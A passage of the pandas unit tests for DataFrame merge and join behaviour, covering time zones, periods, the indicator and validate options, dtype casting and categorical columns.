"date2_y": pd.Series(dtype=dtz),
},
columns=["value_x", "date2_x", "date", "value_y", "date2_y"],
)
tm.assert_frame_equal(result, expected)
def test_merge_datetime64tz_with_dst_transition(self):
# GH 18885
df1 = pd.DataFrame(
pd.date_range("2017-10-29 01:00", periods=4, freq="H", tz="Europe/Madrid"),
columns=["date"],
)
df1["value"] = 1
df2 = pd.DataFrame(
{
"date": pd.to_datetime(
[
"2017-10-29 03:00:00",
"2017-10-29 04:00:00",
"2017-10-29 05:00:00",
]
),
"value": 2,
}
)
df2["date"] = df2["date"].dt.tz_localize("UTC").dt.tz_convert("Europe/Madrid")
result = pd.merge(df1, df2, how="outer", on="date")
expected = pd.DataFrame(
{
"date": pd.date_range(
"2017-10-29 01:00", periods=7, freq="H", tz="Europe/Madrid"
),
"value_x": [1] * 4 + [np.nan] * 3,
"value_y": [np.nan] * 4 + [2] * 3,
}
)
tm.assert_frame_equal(result, expected)
def test_merge_non_unique_period_index(self):
# GH #16871
index = pd.period_range("2016-01-01", periods=16, freq="M")
df = DataFrame(list(range(len(index))), index=index, columns=["pnum"])
df2 = concat([df, df])
result = df.merge(df2, left_index=True, right_index=True, how="inner")
expected = DataFrame(
np.tile(np.arange(16, dtype=np.int64).repeat(2).reshape(-1, 1), 2),
columns=["pnum_x", "pnum_y"],
index=df2.sort_index().index,
)
tm.assert_frame_equal(result, expected)
def test_merge_on_periods(self):
left = pd.DataFrame(
{"key": pd.period_range("20151010", periods=2, freq="D"), "value": [1, 2]}
)
right = pd.DataFrame(
{
"key": pd.period_range("20151011", periods=3, freq="D"),
"value": [1, 2, 3],
}
)
expected = DataFrame(
{
"key": pd.period_range("20151010", periods=4, freq="D"),
"value_x": [1, 2, np.nan, np.nan],
"value_y": [np.nan, 1, 2, 3],
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
left = pd.DataFrame(
{"key": [1, 2], "value": pd.period_range("20151010", periods=2, freq="D")}
)
right = pd.DataFrame(
{"key": [2, 3], "value": pd.period_range("20151011", periods=2, freq="D")}
)
exp_x = pd.period_range("20151010", periods=2, freq="D")
exp_y = pd.period_range("20151011", periods=2, freq="D")
expected = DataFrame(
{
"key": [1, 2, 3],
"value_x": list(exp_x) + [pd.NaT],
"value_y": [pd.NaT] + list(exp_y),
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
assert result["value_x"].dtype == "Period[D]"
assert result["value_y"].dtype == "Period[D]"
def test_indicator(self):
# PR #10054. xref #7412 and closes #8790.
df1 = DataFrame(
{"col1": [0, 1], "col_conflict": [1, 2], "col_left": ["a", "b"]}
)
df1_copy = df1.copy()
df2 = DataFrame(
{
"col1": [1, 2, 3, 4, 5],
"col_conflict": [1, 2, 3, 4, 5],
"col_right": [2, 2, 2, 2, 2],
}
)
df2_copy = df2.copy()
df_result = DataFrame(
{
"col1": [0, 1, 2, 3, 4, 5],
"col_conflict_x": [1, 2, np.nan, np.nan, np.nan, np.nan],
"col_left": ["a", "b", np.nan, np.nan, np.nan, np.nan],
"col_conflict_y": [np.nan, 1, 2, 3, 4, 5],
"col_right": [np.nan, 2, 2, 2, 2, 2],
}
)
df_result["_merge"] = Categorical(
[
"left_only",
"both",
"right_only",
"right_only",
"right_only",
"right_only",
],
categories=["left_only", "right_only", "both"],
)
df_result = df_result[
[
"col1",
"col_conflict_x",
"col_left",
"col_conflict_y",
"col_right",
"_merge",
]
]
test = merge(df1, df2, on="col1", how="outer", indicator=True)
tm.assert_frame_equal(test, df_result)
test = df1.merge(df2, on="col1", how="outer", indicator=True)
tm.assert_frame_equal(test, df_result)
# No side effects
tm.assert_frame_equal(df1, df1_copy)
tm.assert_frame_equal(df2, df2_copy)
# Check with custom name
df_result_custom_name = df_result
df_result_custom_name = df_result_custom_name.rename(
columns={"_merge": "custom_name"}
)
test_custom_name = merge(
df1, df2, on="col1", how="outer", indicator="custom_name"
)
tm.assert_frame_equal(test_custom_name, df_result_custom_name)
test_custom_name = df1.merge(
df2, on="col1", how="outer", indicator="custom_name"
)
tm.assert_frame_equal(test_custom_name, df_result_custom_name)
# Check only accepts strings and booleans
msg = "indicator option can only accept boolean or string arguments"
with pytest.raises(ValueError, match=msg):
merge(df1, df2, on="col1", how="outer", indicator=5)
with pytest.raises(ValueError, match=msg):
df1.merge(df2, on="col1", how="outer", indicator=5)
# Check result integrity
test2 = merge(df1, df2, on="col1", how="left", indicator=True)
assert (test2._merge != "right_only").all()
test2 = df1.merge(df2, on="col1", how="left", indicator=True)
assert (test2._merge != "right_only").all()
test3 = merge(df1, df2, on="col1", how="right", indicator=True)
assert (test3._merge != "left_only").all()
test3 = df1.merge(df2, on="col1", how="right", indicator=True)
assert (test3._merge != "left_only").all()
test4 = merge(df1, df2, on="col1", how="inner", indicator=True)
assert (test4._merge == "both").all()
test4 = df1.merge(df2, on="col1", how="inner", indicator=True)
assert (test4._merge == "both").all()
# Check if working name in df
for i in ["_right_indicator", "_left_indicator", "_merge"]:
df_badcolumn = DataFrame({"col1": [1, 2], i: [2, 2]})
msg = (
"Cannot use `indicator=True` option when data contains a "
f"column named {i}|"
"Cannot use name of an existing column for indicator column"
)
with pytest.raises(ValueError, match=msg):
merge(df1, df_badcolumn, on="col1", how="outer", indicator=True)
with pytest.raises(ValueError, match=msg):
df1.merge(df_badcolumn, on="col1", how="outer", indicator=True)
# Check for name conflict with custom name
df_badcolumn = DataFrame({"col1": [1, 2], "custom_column_name": [2, 2]})
msg = "Cannot use name of an existing column for indicator column"
with pytest.raises(ValueError, match=msg):
merge(
df1,
df_badcolumn,
on="col1",
how="outer",
indicator="custom_column_name",
)
with pytest.raises(ValueError, match=msg):
df1.merge(
df_badcolumn, on="col1", how="outer", indicator="custom_column_name"
)
# Merge on multiple columns
df3 = DataFrame({"col1": [0, 1], "col2": ["a", "b"]})
df4 = DataFrame({"col1": [1, 1, 3], "col2": ["b", "x", "y"]})
hand_coded_result = DataFrame(
{"col1": [0, 1, 1, 3], "col2": ["a", "b", "x", "y"]}
)
hand_coded_result["_merge"] = Categorical(
["left_only", "both", "right_only", "right_only"],
categories=["left_only", "right_only", "both"],
)
test5 = merge(df3, df4, on=["col1", "col2"], how="outer", indicator=True)
tm.assert_frame_equal(test5, hand_coded_result)
test5 = df3.merge(df4, on=["col1", "col2"], how="outer", indicator=True)
tm.assert_frame_equal(test5, hand_coded_result)
def test_validation(self):
left = DataFrame(
{"a": ["a", "b", "c", "d"], "b": ["cat", "dog", "weasel", "horse"]},
index=range(4),
)
right = DataFrame(
{
"a": ["a", "b", "c", "d", "e"],
"c": ["meow", "bark", "um... weasel noise?", "nay", "chirp"],
},
index=range(5),
)
# Make sure no side effects.
left_copy = left.copy()
right_copy = right.copy()
result = merge(left, right, left_index=True, right_index=True, validate="1:1")
tm.assert_frame_equal(left, left_copy)
tm.assert_frame_equal(right, right_copy)
# make sure merge still correct
expected = DataFrame(
{
"a_x": ["a", "b", "c", "d"],
"b": ["cat", "dog", "weasel", "horse"],
"a_y": ["a", "b", "c", "d"],
"c": ["meow", "bark", "um... weasel noise?", "nay"],
},
index=range(4),
columns=["a_x", "b", "a_y", "c"],
)
result = merge(
left, right, left_index=True, right_index=True, validate="one_to_one"
)
tm.assert_frame_equal(result, expected)
expected_2 = DataFrame(
{
"a": ["a", "b", "c", "d"],
"b": ["cat", "dog", "weasel", "horse"],
"c": ["meow", "bark", "um... weasel noise?", "nay"],
},
index=range(4),
)
result = merge(left, right, on="a", validate="1:1")
tm.assert_frame_equal(left, left_copy)
tm.assert_frame_equal(right, right_copy)
tm.assert_frame_equal(result, expected_2)
result = merge(left, right, on="a", validate="one_to_one")
tm.assert_frame_equal(result, expected_2)
# One index, one column
expected_3 = DataFrame(
{
"b": ["cat", "dog", "weasel", "horse"],
"a": ["a", "b", "c", "d"],
"c": ["meow", "bark", "um... weasel noise?", "nay"],
},
columns=["b", "a", "c"],
index=range(4),
)
left_index_reset = left.set_index("a")
result = merge(
left_index_reset,
right,
left_index=True,
right_on="a",
validate="one_to_one",
)
tm.assert_frame_equal(result, expected_3)
# Dups on right
right_w_dups = right.append(pd.DataFrame({"a": ["e"], "c": ["moo"]}, index=[4]))
merge(
left,
right_w_dups,
left_index=True,
right_index=True,
validate="one_to_many",
)
msg = "Merge keys are not unique in right dataset; not a one-to-one merge"
with pytest.raises(MergeError, match=msg):
merge(
left,
right_w_dups,
left_index=True,
right_index=True,
validate="one_to_one",
)
with pytest.raises(MergeError, match=msg):
merge(left, right_w_dups, on="a", validate="one_to_one")
# Dups on left
left_w_dups = left.append(
pd.DataFrame({"a": ["a"], "c": ["cow"]}, index=[3]), sort=True
)
merge(
left_w_dups,
right,
left_index=True,
right_index=True,
validate="many_to_one",
)
msg = "Merge keys are not unique in left dataset; not a one-to-one merge"
with pytest.raises(MergeError, match=msg):
merge(
left_w_dups,
right,
left_index=True,
right_index=True,
validate="one_to_one",
)
with pytest.raises(MergeError, match=msg):
merge(left_w_dups, right, on="a", validate="one_to_one")
# Dups on both
merge(left_w_dups, right_w_dups, on="a", validate="many_to_many")
msg = "Merge keys are not unique in right dataset; not a many-to-one merge"
with pytest.raises(MergeError, match=msg):
merge(
left_w_dups,
right_w_dups,
left_index=True,
right_index=True,
validate="many_to_one",
)
msg = "Merge keys are not unique in left dataset; not a one-to-many merge"
with pytest.raises(MergeError, match=msg):
merge(left_w_dups, right_w_dups, on="a", validate="one_to_many")
# Check invalid arguments
msg = "Not a valid argument for validate"
with pytest.raises(ValueError, match=msg):
merge(left, right, on="a", validate="jibberish")
# Two column merge, dups in both, but jointly no dups.
left = DataFrame(
{
"a": ["a", "a", "b", "b"],
"b": [0, 1, 0, 1],
"c": ["cat", "dog", "weasel", "horse"],
},
index=range(4),
)
right = DataFrame(
{
"a": ["a", "a", "b"],
"b": [0, 1, 0],
"d": ["meow", "bark", "um... weasel noise?"],
},
index=range(3),
)
expected_multi = DataFrame(
{
"a": ["a", "a", "b"],
"b": [0, 1, 0],
"c": ["cat", "dog", "weasel"],
"d": ["meow", "bark", "um... weasel noise?"],
},
index=range(3),
)
msg = (
"Merge keys are not unique in either left or right dataset; "
"not a one-to-one merge"
)
with pytest.raises(MergeError, match=msg):
merge(left, right, on="a", validate="1:1")
result = merge(left, right, on=["a", "b"], validate="1:1")
tm.assert_frame_equal(result, expected_multi)
def test_merge_two_empty_df_no_division_error(self):
# GH17776, PR #17846
a = pd.DataFrame({"a": [], "b": [], "c": []})
with np.errstate(divide="raise"):
merge(a, a, on=("a", "b"))
@pytest.mark.parametrize("how", ["right", "outer"])
@pytest.mark.parametrize(
"index,expected_index",
[
(
CategoricalIndex([1, 2, 4]),
CategoricalIndex([1, 2, 4, None, None, None]),
),
(
DatetimeIndex(["2001-01-01", "2002-02-02", "2003-03-03"]),
DatetimeIndex(
["2001-01-01", "2002-02-02", "2003-03-03", pd.NaT, pd.NaT, pd.NaT]
),
),
(Float64Index([1, 2, 3]), Float64Index([1, 2, 3, None, None, None])),
(Int64Index([1, 2, 3]), Float64Index([1, 2, 3, None, None, None])),
(
IntervalIndex.from_tuples([(1, 2), (2, 3), (3, 4)]),
IntervalIndex.from_tuples(
[(1, 2), (2, 3), (3, 4), np.nan, np.nan, np.nan]
),
),
(
PeriodIndex(["2001-01-01", "2001-01-02", "2001-01-03"], freq="D"),
PeriodIndex(
["2001-01-01", "2001-01-02", "2001-01-03", pd.NaT, pd.NaT, pd.NaT],
freq="D",
),
),
(
TimedeltaIndex(["1d", "2d", "3d"]),
TimedeltaIndex(["1d", "2d", "3d", pd.NaT, pd.NaT, pd.NaT]),
),
],
)
def test_merge_on_index_with_more_values(self, how, index, expected_index):
# GH 24212
# pd.merge gets [0, 1, 2, -1, -1, -1] as left_indexer, ensure that
# -1 is interpreted as a missing value instead of the last element
df1 = pd.DataFrame({"a": [0, 1, 2], "key": [0, 1, 2]}, index=index)
df2 = pd.DataFrame({"b": [0, 1, 2, 3, 4, 5]})
result = df1.merge(df2, left_on="key", right_index=True, how=how)
expected = pd.DataFrame(
[
[0, 0, 0],
[1, 1, 1],
[2, 2, 2],
[np.nan, 3, 3],
[np.nan, 4, 4],
[np.nan, 5, 5],
],
columns=["a", "key", "b"],
)
expected.set_index(expected_index, inplace=True)
tm.assert_frame_equal(result, expected)
def test_merge_right_index_right(self):
# Note: the expected output here is probably incorrect.
# See https://github.com/pandas-dev/pandas/issues/17257 for more.
# We include this as a regression test for GH-24897.
left = pd.DataFrame({"a": [1, 2, 3], "key": [0, 1, 1]})
right = pd.DataFrame({"b": [1, 2, 3]})
expected = pd.DataFrame(
{"a": [1, 2, 3, None], "key": [0, 1, 1, 2], "b": [1, 2, 2, 3]},
columns=["a", "key", "b"],
index=[0, 1, 2, np.nan],
)
result = left.merge(right, left_on="key", right_index=True, how="right")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("how", ["left", "right"])
def test_merge_preserves_row_order(self, how):
# GH 27453
left_df = pd.DataFrame({"animal": ["dog", "pig"], "max_speed": [40, 11]})
right_df = pd.DataFrame({"animal": ["quetzal", "pig"], "max_speed": [80, 11]})
result = left_df.merge(right_df, on=["animal", "max_speed"], how=how)
if how == "right":
expected = pd.DataFrame(
{"animal": ["quetzal", "pig"], "max_speed": [80, 11]}
)
else:
expected = pd.DataFrame({"animal": ["dog", "pig"], "max_speed": [40, 11]})
tm.assert_frame_equal(result, expected)
def test_merge_take_missing_values_from_index_of_other_dtype(self):
# GH 24212
left = pd.DataFrame(
{
"a": [1, 2, 3],
"key": pd.Categorical(["a", "a", "b"], categories=list("abc")),
}
)
right = pd.DataFrame(
{"b": [1, 2, 3]}, index=pd.CategoricalIndex(["a", "b", "c"])
)
result = left.merge(right, left_on="key", right_index=True, how="right")
expected = pd.DataFrame(
{
"a": [1, 2, 3, None],
"key": pd.Categorical(["a", "a", "b", "c"]),
"b": [1, 1, 2, 3],
},
index=[0, 1, 2, np.nan],
)
expected = expected.reindex(columns=["a", "key", "b"])
tm.assert_frame_equal(result, expected)
def test_merge_readonly(self):
# https://github.com/pandas-dev/pandas/issues/27943
data1 = pd.DataFrame(
np.arange(20).reshape((4, 5)) + 1, columns=["a", "b", "c", "d", "e"]
)
data2 = pd.DataFrame(
np.arange(20).reshape((5, 4)) + 1, columns=["a", "b", "x", "y"]
)
data1._mgr.blocks[0].values.flags.writeable = False
data1.merge(data2) # no error
def _check_merge(x, y):
for how in ["inner", "left", "outer"]:
result = x.join(y, how=how)
expected = merge(x.reset_index(), y.reset_index(), how=how, sort=True)
expected = expected.set_index("index")
# TODO check_names on merge?
tm.assert_frame_equal(result, expected, check_names=False)
class TestMergeDtypes:
@pytest.mark.parametrize(
"right_vals", [["foo", "bar"], Series(["foo", "bar"]).astype("category")]
)
def test_different(self, right_vals):
left = DataFrame(
{
"A": ["foo", "bar"],
"B": Series(["foo", "bar"]).astype("category"),
"C": [1, 2],
"D": [1.0, 2.0],
"E": Series([1, 2], dtype="uint64"),
"F": Series([1, 2], dtype="int32"),
}
)
right = DataFrame({"A": right_vals})
# GH 9780
# We allow merging on object and categorical cols and cast
# categorical cols to object
result = pd.merge(left, right, on="A")
assert is_object_dtype(result.A.dtype)
@pytest.mark.parametrize("d1", [np.int64, np.int32, np.int16, np.int8, np.uint8])
@pytest.mark.parametrize("d2", [np.int64, np.float64, np.float32, np.float16])
def test_join_multi_dtypes(self, d1, d2):
dtype1 = np.dtype(d1)
dtype2 = np.dtype(d2)
left = DataFrame(
{
"k1": np.array([0, 1, 2] * 8, dtype=dtype1),
"k2": ["foo", "bar"] * 12,
"v": np.array(np.arange(24), dtype=np.int64),
}
)
index = MultiIndex.from_tuples([(2, "bar"), (1, "foo")])
right = DataFrame({"v2": np.array([5, 7], dtype=dtype2)}, index=index)
result = left.join(right, on=["k1", "k2"])
expected = left.copy()
if dtype2.kind == "i":
dtype2 = np.dtype("float64")
expected["v2"] = np.array(np.nan, dtype=dtype2)
expected.loc[(expected.k1 == 2) & (expected.k2 == "bar"), "v2"] = 5
expected.loc[(expected.k1 == 1) & (expected.k2 == "foo"), "v2"] = 7
tm.assert_frame_equal(result, expected)
result = left.join(right, on=["k1", "k2"], sort=True)
expected.sort_values(["k1", "k2"], kind="mergesort", inplace=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"int_vals, float_vals, exp_vals",
[
([1, 2, 3], [1.0, 2.0, 3.0], {"X": [1, 2, 3], "Y": [1.0, 2.0, 3.0]}),
([1, 2, 3], [1.0, 3.0], {"X": [1, 3], "Y": [1.0, 3.0]}),
([1, 2], [1.0, 2.0, 3.0], {"X": [1, 2], "Y": [1.0, 2.0]}),
],
)
def test_merge_on_ints_floats(self, int_vals, float_vals, exp_vals):
# GH 16572
# Check that float column is not cast to object if
# merging on float and int columns
A = DataFrame({"X": int_vals})
B = DataFrame({"Y": float_vals})
expected = DataFrame(exp_vals)
result = A.merge(B, left_on="X", right_on="Y")
tm.assert_frame_equal(result, expected)
result = B.merge(A, left_on="Y", right_on="X")
tm.assert_frame_equal(result, expected[["Y", "X"]])
def test_merge_key_dtype_cast(self):
# GH 17044
df1 = DataFrame({"key": [1.0, 2.0], "v1": [10, 20]}, columns=["key", "v1"])
df2 = DataFrame({"key": [2], "v2": [200]}, columns=["key", "v2"])
result = df1.merge(df2, on="key", how="left")
expected = DataFrame(
{"key": [1.0, 2.0], "v1": [10, 20], "v2": [np.nan, 200.0]},
columns=["key", "v1", "v2"],
)
tm.assert_frame_equal(result, expected)
def test_merge_on_ints_floats_warning(self):
# GH 16572
# merge will produce a warning when merging on int and
# float columns where the float values are not exactly
# equal to their int representation
A = DataFrame({"X": [1, 2, 3]})
B = DataFrame({"Y": [1.1, 2.5, 3.0]})
expected = DataFrame({"X": [3], "Y": [3.0]})
with tm.assert_produces_warning(UserWarning):
result = A.merge(B, left_on="X", right_on="Y")
tm.assert_frame_equal(result, expected)
with tm.assert_produces_warning(UserWarning):
result = B.merge(A, left_on="Y", right_on="X")
tm.assert_frame_equal(result, expected[["Y", "X"]])
# test no warning if float has NaNs
B = DataFrame({"Y": [np.nan, np.nan, 3.0]})
with tm.assert_produces_warning(None):
result = B.merge(A, left_on="Y", right_on="X")
tm.assert_frame_equal(result, expected[["Y", "X"]])
def test_merge_incompat_infer_boolean_object(self):
# GH21119: bool + object bool merge OK
df1 = DataFrame({"key": Series([True, False], dtype=object)})
df2 = DataFrame({"key": [True, False]})
expected = DataFrame({"key": [True, False]}, dtype=object)
result = pd.merge(df1, df2, on="key")
tm.assert_frame_equal(result, expected)
result = pd.merge(df2, df1, on="key")
tm.assert_frame_equal(result, expected)
# with missing value
df1 = DataFrame({"key": Series([True, False, np.nan], dtype=object)})
df2 = DataFrame({"key": [True, False]})
expected = DataFrame({"key": [True, False]}, dtype=object)
result = pd.merge(df1, df2, on="key")
tm.assert_frame_equal(result, expected)
result = pd.merge(df2, df1, on="key")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"df1_vals, df2_vals",
[
# merge on category coerces to object
([0, 1, 2], Series(["a", "b", "a"]).astype("category")),
([0.0, 1.0, 2.0], Series(["a", "b", "a"]).astype("category")),
# do not infer
([0, 1], pd.Series([False, True], dtype=object)),
([0, 1], pd.Series([False, True], dtype=bool)),
],
)
def test_merge_incompat_dtypes_are_ok(self, df1_vals, df2_vals):
# these are explicitly allowed incompatible merges that pass through;
# the result type depends on whether the values on the rhs are
# inferred, otherwise these will be coerced to object
df1 = DataFrame({"A": df1_vals})
df2 = DataFrame({"A": df2_vals})
result = pd.merge(df1, df2, on=["A"])
assert is_object_dtype(result.A.dtype)
result = pd.merge(df2, df1, on=["A"])
assert is_object_dtype(result.A.dtype)
@pytest.mark.parametrize(
"df1_vals, df2_vals",
[
# do not infer to numeric
(Series([1, 2], dtype="uint64"), ["a", "b", "c"]),
(Series([1, 2], dtype="int32"), ["a", "b", "c"]),
([0, 1, 2], ["0", "1", "2"]),
([0.0, 1.0, 2.0], ["0", "1", "2"]),
([0, 1, 2], ["0", "1", "2"]),
(
pd.date_range("1/1/2011", periods=2, freq="D"),
["2011-01-01", "2011-01-02"],
),
(pd.date_range("1/1/2011", periods=2, freq="D"), [0, 1]),
(pd.date_range("1/1/2011", periods=2, freq="D"), [0.0, 1.0]),
(
pd.date_range("20130101", periods=3),
pd.date_range("20130101", periods=3, tz="US/Eastern"),
),
],
)
def test_merge_incompat_dtypes_error(self, df1_vals, df2_vals):
# GH 9780, GH 15800
# Raise a ValueError when a user tries to merge on
# dtypes that are incompatible (e.g., obj and int/float)
df1 = DataFrame({"A": df1_vals})
df2 = DataFrame({"A": df2_vals})
msg = (
f"You are trying to merge on {df1['A'].dtype} and "
f"{df2['A'].dtype} columns. If you wish to proceed "
"you should use pd.concat"
)
msg = re.escape(msg)
with pytest.raises(ValueError, match=msg):
pd.merge(df1, df2, on=["A"])
# Check that error still raised when swapping order of dataframes
msg = (
f"You are trying to merge on {df2['A'].dtype} and "
f"{df1['A'].dtype} columns. If you wish to proceed "
"you should use pd.concat"
)
msg = re.escape(msg)
with pytest.raises(ValueError, match=msg):
pd.merge(df2, df1, on=["A"])
@pytest.fixture
def left():
np.random.seed(1234)
return DataFrame(
{
"X": Series(np.random.choice(["foo", "bar"], size=(10,))).astype(
CDT(["foo", "bar"])
),
"Y": np.random.choice(["one", "two", "three"], size=(10,)),
}
)
@pytest.fixture
def right():
np.random.seed(1234)
return DataFrame(
{"X": Series(["foo", "bar"]).astype(CDT(["foo", "bar"])), "Z": [1, 2]}
)
class TestMergeCategorical:
def test_identical(self, left):
# merging on the same, should preserve dtypes
merged = pd.merge(left, left, on="X")
result = merged.dtypes.sort_index()
expected = Series(
[CategoricalDtype(), np.dtype("O"), np.dtype("O")],
index=["X", "Y_x", "Y_y"],
)
tm.assert_series_equal(result, expected)
def test_basic(self, left, right):
# we have matching Categorical dtypes in X
# so should preserve the merged column
merged = pd.merge(left, right, on="X")
result = merged.dtypes.sort_index()
expected = Series(
[CategoricalDtype(), np.dtype("O"), np.dtype("int64")],
index=["X", "Y", "Z"],
)
tm.assert_series_equal(result, expected)
def test_merge_categorical(self):
# GH 9426
right = DataFrame(
{
"c": {0: "a", 1: "b", 2: "c", 3: "d", 4: "e"},
"d": {0: "null", 1: "null", 2: "null", 3: "null", 4: "null"},
}
)
left = DataFrame(
{
"a": {0: "f", 1: "f", 2: "f", 3: "f", 4: "f"},
"b": {0: "g", 1: "g", 2: "g", 3: "g", 4: "g"},
}
)
df = pd.merge(left, right, how="left", left_on="b", right_on="c")
# object-object
expected = df.copy()
# object-cat
# note that we propagate the category
# because we don't have any matching rows
cright = right.copy()
cright["d"] = cright["d"].astype("category")
result = pd.merge(left, cright, how="left", left_on="b", right_on="c")
expected["d"] = expected["d"].astype(CategoricalDtype(["null"]))
tm.assert_frame_equal(result, expected)
# cat-object
cleft = left.copy()
cleft["b"] = cleft["b"].astype("category")
result = pd.merge(cleft, cright, how="left", left_on="b", right_on="c")
tm.assert_frame_equal(result, expected)
# cat-cat
cright = right.copy()
cright["d"] = cright["d"].astype("category")
cleft = left.copy()
cleft["b"] = cleft["b"].astype("category")
result = pd.merge(cleft, cright, how="left", left_on="b", right_on="c")
tm.assert_frame_equal(result, expected)
def tests_merge_categorical_unordered_equal(self):
# GH-19551
df1 = DataFrame(
{
"Foo": Categorical(["A", "B", "C"], categories=["A", "B", "C"]),
"Left": ["A0", "B0", "C0"],
}
)
df2 = DataFrame(
{
"Foo": Categorical(["C", "B", "A"], categories=["C", "B", "A"]),
"Right": ["C1", "B1", "A1"],
}
)
result = pd.merge(df1, df2, on=["Foo"])
expected = DataFrame(
{
"Foo": pd.Categorical(["A", "B", "C"]),
"Left": ["A0", "B0", "C0"],
"Right": ["A1", "B1", "C1"],
}
)
tm.assert_frame_equal(result, expected)
def test_other_columns(self, left, right):
# non-merge columns should preserve if possible
right = right.assign(Z=right.Z.astype("category"))
merged = pd.merge(left, right, on="X")
result = merged.dtypes.sort_index()
expected = Series(
[CategoricalDtype(), np.dtype("O"), CategoricalDtype()],
index=["X", "Y", "Z"],
)
tm.assert_series_equal(result, expected)
# categories are preserved
assert left.X.values.is_dtype_equal(merged.X.values)
assert right.Z.values.is_dtype_equal(merged.Z.values)
@pytest.mark.parametrize(
"change",
[
lambda x: x,
lambda x: x.astype(CDT(["foo", "bar", "bah"])),
lambda x: x.astype(CDT(ordered=True)),
],
)
def test_dtype_on_merged_different(self, change, join_type, left, right):
# our merging columns, X now has 2 different dtypes
# so we must be object as a result
X = change(right.X.astype("object"))
right = right.assign(X=X)
assert is_categorical_dtype(left.X.values.dtype)
# assert not left.X.values.is_dtype_equal(right.X.values)
merged = pd.merge(left, right, on="X", how=join_type)
result = merged.dtypes.sort_index()
expected = Series(
[np.dtype("O"), np.dtype("O"), np.dtype("int64")], index=["X", "Y", "Z"]
)
tm.assert_series_equal(result, expected)
def test_self_join_multiple_categories(self):
# GH 16767
# non-duplicates should work with multiple categories
m = 5
df = pd.DataFrame(
{
"a": ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"] * m,
"b": ["t", "w", "x", "y", "z"] * 2 * m,
"c": [
letter
for each in ["m", "n", "u", "p", "o"]
for letter in [each] * 2 * m
],
"d": [
letter
for each in [
"aa",
"bb",
"cc",
"dd",
"ee",
"ff",
"gg",
"hh",
"ii",
"jj",
]
for letter in [each] * m
],
}
)
# change them all to categorical variables
df = df.apply(lambda x: x.astype("category"))
# self-join should equal ourselves
result = pd.merge(df, df, on=list(df.columns))
tm.assert_frame_equal(result, df)
def test_dtype_on_categorical_dates(self):
# GH 16900
# dates should not be coerced to ints
df = pd.DataFrame(
[[date(2001, 1, 1), 1.1], [date(2001, 1, 2), 1.3]], columns=["date", "num2"]
)
df["date"] = df["date"].astype("category")
df2 = pd.DataFrame(
[[date(2001, 1, 1), 1.3], [date(2001, 1, 3), 1.4]], columns=["date", "num4"]
)
df2["date"] = df2["date"].astype("category")
expected_outer = pd.DataFrame(
[
[pd.Timestamp("2001-01-01"), 1.1, 1.3],
[pd.Timestamp("2001-01-02"), 1.3, np.nan],
[pd.Timestamp("2001-01-03"), np.nan, 1.4],
],
columns=["date", "num2", "num4"],
)
result_outer = pd.merge(df, df2, how="outer", on=["date"])
tm.assert_frame_equal(result_outer, expected_outer)
expected_inner = pd.DataFrame(
[[pd.Timestamp("2001-01-01"), 1.1, 1.3]], columns=["date", "num2", "num4"]
)
result_inner = pd.merge(df, df2, how="inner", on=["date"])
tm.assert_frame_equal(result_inner, expected_inner)
@pytest.mark.parametrize("ordered", [True, False])
@pytest.mark.parametrize(
"category_column,categories,expected_categories",
[
([False, True, True, False], [True, False], [True, False]),
([2, 1, 1, 2], [1, 2], [1, 2]),
(["False", "True", "True", "False"], ["True", "False"], ["True", "False"]),
],
)
    def test_merging_with_bool_or_int_categorical_column(
self, category_column, categories, expected_categories, ordered
):
# GH 17187
# merging with a boolean/int categorical column
df1 = pd.DataFrame({"id": [1, 2, 3, 4], "cat": category_column})
df1["cat"] = df1["cat"].astype(CDT(categories, ordered=ordered))
df2 = pd.DataFrame({"id": [2, 4], "num": [1, 9]})
result = df1.merge(df2)
expected = pd.DataFrame(
{"id": [2, 4], "cat": expected_categories, "num": [1, 9]}
)
expected["cat"] = expected["cat"].astype(CDT(categories, ordered=ordered))
tm.assert_frame_equal(expected, result)
def test_merge_on_int_array(self):
# GH 23020
df = pd.DataFrame({"A": pd.Series([1, 2, np.nan], dtype="Int64"), "B": 1})
result = pd.merge(df, df, on="A")
expected = pd.DataFrame(
{"A": pd.Series([1, 2, np.nan], dtype="Int64"), "B_x": 1, "B_y": 1}
)
tm.assert_frame_equal(result, expected)
@pytest.fixture
def left_df():
return DataFrame({"a": [20, 10, 0]}, index=[2, 1, 0])
@pytest.fixture
def right_df():
return DataFrame({"b": [300, 100, 200]}, index=[3, 1, 2])
class TestMergeOnIndexes:
@pytest.mark.parametrize(
"how, sort, expected",
[
("inner", False, DataFrame({"a": [20, 10], "b": [200, 100]}, index=[2, 1])),
("inner", True, DataFrame({"a": [10, 20], "b": [100, 200]}, index=[1, 2])),
(
"left",
False,
DataFrame({"a": [20, 10, 0], "b": [200, 100, np.nan]}, index=[2, 1, 0]),
),
(
"left",
True,
DataFrame({"a": [0, 10, 20], "b": [np.nan, 100, 200]}, index=[0, 1, 2]),
),
(
"right",
False,
DataFrame(
{"a": [np.nan, 10, 20], "b": [300, 100, 200]}, index=[3, 1, 2]
),
),
(
"right",
True,
DataFrame(
{"a": [10, 20, np.nan], "b": [100, 200, 300]}, index=[1, 2, 3]
),
),
(
"outer",
False,
DataFrame(
{"a": [0, 10, 20, np.nan], "b": [np.nan, 100, 200, 300]},
index=[0, 1, 2, 3],
),
),
(
"outer",
True,
DataFrame(
{"a": [0, 10, 20, np.nan], "b": [np.nan, 100, 200, 300]},
index=[0, 1, 2, 3],
),
),
],
)
def test_merge_on_indexes(self, left_df, right_df, how, sort, expected):
result = pd.merge(
left_df, right_df, left_index=True, right_index=True, how=how, sort=sort
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"index",
[
CategoricalIndex(["A", "B"], categories=["A", "B"], name="index_col"),
Float64Index([1.0, 2.0], name="index_col"),
Int64Index([1, 2], name="index_col"),
UInt64Index([1, 2], name="index_col"),
RangeIndex(start=0, stop=2, name="index_col"),
DatetimeIndex(["2018-01-01", "2018-01-02"], name="index_col"),
],
ids=lambda x: type(x).__name__,
)
def test_merge_index_types(index):
# gh-20777
# assert key access is consistent across index types
left = DataFrame({"left_data": [1, 2]}, index=index)
right = DataFrame({"right_data": [1.0, 2.0]}, index=index)
result = left.merge(right, on=["index_col"])
expected = DataFrame(
